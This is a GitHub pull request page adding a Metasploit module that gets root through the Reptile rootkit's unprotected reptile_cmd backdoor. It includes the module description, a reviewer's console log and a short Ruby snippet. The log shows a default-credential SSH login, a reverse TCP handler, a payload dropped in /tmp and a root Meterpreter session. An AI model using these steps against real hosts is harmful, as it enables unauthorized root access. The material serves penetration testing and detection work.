Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Reptile Rootkit reptile_cmd Privilege Escalation #12701

Merged
merged 1 commit into from Dec 21, 2019

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Dec 11, 2019

Add Reptile Rootkit reptile_cmd Privilege Escalation.

    This module uses Reptile rootkit's `reptile_cmd` backdoor executable
    to gain root privileges using the `root` command.

    This module has been tested successfully with Reptile from `master`
    branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).

@bcoles
Copy link
Contributor Author

@bcoles bcoles commented Dec 11, 2019

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Reptile's features, beyond simply leveraging reptile_cmd to elevate privileges.

The value of this module is largely derived from the check method. The reptile_cmd utility is not password protected, so offers a trivial avenue to root, regardless of who installed it. If the rootkit has been installed to the default directory (/reptile), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Reptile while performing other privesc checks.

@h00die h00die self-assigned this Dec 21, 2019
@h00die
Copy link
Contributor

@h00die h00die commented Dec 21, 2019

Working for me, will check through the PR later, get this landed today

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' ''
[*] Command shell session 1 opened (1.1.1.1:37937 -> 2.2.2.2:22) at 2019-12-21 07:55:28 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] The target is vulnerable.
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Writing '/tmp/.BF9f4W2hW1p' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (985320 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:43474) at 2019-12-21 07:56:07 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
vprint_status "Output: #{res}"

if res.include?('You have no power here!')
Copy link
Contributor

@h00die h00die Dec 21, 2019

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@h00die
Copy link
Contributor

@h00die h00die commented Dec 21, 2019

as assumed, code looks good, its trivial at its most difficult, so going to go ahead and land!

@h00die h00die merged commit 1ebfe6c into rapid7:master Dec 21, 2019
3 checks passed
@h00die
Copy link
Contributor

@h00die h00die commented Dec 21, 2019

Release Notes

This adds a local privilege escalation against a host which has the reptile linux rootkit installed.

@h00die
Copy link
Contributor

@h00die h00die commented Dec 21, 2019

why do i get the strange feeling there are a few more of these you have lined up to add :)

@bcoles bcoles deleted the reptile_rootkit_reptile_cmd_priv_esc branch Dec 21, 2019
@tperry-r7 tperry-r7 added the rn-modules label Jan 14, 2020
@bcoles
Copy link
Contributor Author

@bcoles bcoles commented Feb 16, 2020

why do i get the strange feeling there are a few more of these you have lined up to add :)

<_< ( #12942 )

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants